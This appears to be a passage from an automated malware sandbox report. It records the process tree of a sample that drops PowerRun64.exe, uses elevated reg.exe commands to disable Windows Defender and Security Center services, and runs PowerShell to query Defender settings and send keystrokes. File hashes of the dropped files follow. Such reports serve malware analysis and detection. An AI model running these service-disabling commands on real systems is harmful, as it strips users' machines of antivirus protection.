C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:3684 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:3504 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2624 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:620
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:1476 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:2796 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4712 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2684
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:4012 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4088 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2056
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:3788 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:4940 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2016 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:1556 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4948
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:4044 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2616 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f6⤵
- Modifies security service
PID:1040
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f3⤵
- Executes dropped EXE
PID:116 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f4⤵
- Executes dropped EXE
PID:3684 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f5⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4232 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f6⤵PID:2692
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Get-MpPreference"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4028
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')3⤵
- Command and Scripting Interpreter: PowerShell
PID:1464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')3⤵
- Command and Scripting Interpreter: PowerShell
PID:1948
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\win_version_csharp.exe"C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\win_version_csharp.exe"2⤵
- Executes dropped EXE
PID:760
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD56ab400920d67c478f26545fe8065f521
SHA1244ce6b990d8ba19f46650fff109e86c91279dac
SHA2569b4f7d3374f46a886e99fa3e09c694ea145250dc9c9938b6052cca1075c9ead7
SHA51243659a4cee165fcfed85bc763161d25363e306c07d395dc96173e286f5d9e5b4aaa1e211b1d12175e1f7ff28ecb37a857bdfd32db16bec1a02e286f6bfcc551c
-
Filesize
16KB
MD56894f711194ee152f632ab17f90251af
SHA1f05f52d4cbc5d646f0deda2cf698e4703d01a62c
SHA2564e8a6a4738f28da831ea406f5202227299dbab751d6c68281e1c74fe239d53df
SHA5129ff529629a09f1d985cc64e7ce28d531e3a8f10d7c44e24a27215e4dc9c0d533832f362953bce0a0ed4456d3e34189641715106fd680ffbd5d669befdd44f68a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
25KB
MD5436c1bb98deeccecb73fad945f1dd3dc
SHA1774313ba911945589971bbc73498d81f060dabe6
SHA25605eae1691149cc66e458d5e5b4430bd3b938b278b8bdb2c887a13c9871004c51
SHA51266ea41b9b4a42f7c40d1ce5b6e82a6f03e8489648b912d96a81efa13d340d4d651078df7c1302c595ca83408e7208d1d79f02165dc27383952a9abe7f851c3e2
-
Filesize
923KB
MD5efe5769e37ba37cf4607cb9918639932
SHA1f24ca204af2237a714e8b41d54043da7bbe5393b
SHA2565f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA51233794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1
-
Filesize
601KB
MD51fb64ff73938f4a04e97e5e7bf3d618c
SHA1aa0f7db484d0c580533dec0e9964a59588c3632b
SHA2564efc87b7e585fcbe4eaed656d3dbadaec88beca7f92ca7f0089583b428a6b221
SHA512da6007847ffe724bd0b0abe000b0dd5596e2146f4c52c8fe541a2bf5f5f2f5893dccd53ef315206f46a9285ddbd766010b226873038ccac7981192d8c9937ece
-
Filesize
7KB
MD5b4579bc396ace8cafd9e825ff63fe244
SHA132a87ed28a510e3b3c06a451d1f3d0ba9faf8d9c
SHA25601e72332362345c415a7edcb366d6a1b52be9ac6e946fb9da49785c140ba1a4b
SHA5123a76e0e259a0ca12275fed922ce6e01bdfd9e33ba85973e80101b8025ef9243f5e32461a113bbcc6aa75e40894bb5d3a42d6b21045517b6b3cf12d76b4cfa36a
-
Filesize
12KB
MD51abf8067994181b1a38867bf6437f9d2
SHA1d25e23848f65b85f0f21e9a0a69e4268b625eca2
SHA25623bbb732ff55ab62dc8863a69626ef5655f60bf0d7b96fa2818a895e81283b40
SHA5126237826de2feaf63c2f1312680118474f9b60f5516a05e171743a09a088d7c9bfd06ce9de17852e6f4c2dcb577814163621ff27b2a7bbb37f2a1ae130f64d882
-
Filesize
6KB
MD57cb364701028767f8942cc3f8439f8f2
SHA1d6bede2206b7042b4cae32f416e1b43ffac94238
SHA256a2716605f8dd1930808e6918db670a3fe32287791862883dbabd26849b87b09e
SHA5123011b3d64f79280ab05de9658c4f5a13f637ad2e79d5770cfaeb3af6cb8c7a56b610dad69fdf295112be64cfb80e18f30bb1829eb3c0e549105f63d0e770dc13
-
Filesize
81KB
MD5940b1915cadee0e2b33d80799816f6c7
SHA12c10e4fec3e8c054055d1ed78757117575f273f2
SHA25681e89e7266cfe5158e44f5578c8be61353e781daebdd47a33597e9ec503d379c
SHA512cc3c574fd5392c1b54146b591e22b1c01c95e34a602c403ad96c49b7ee6ad31d1478a00cc1334286addc5cb94496372a172745e9ad20554023e1e22c7da1e1c5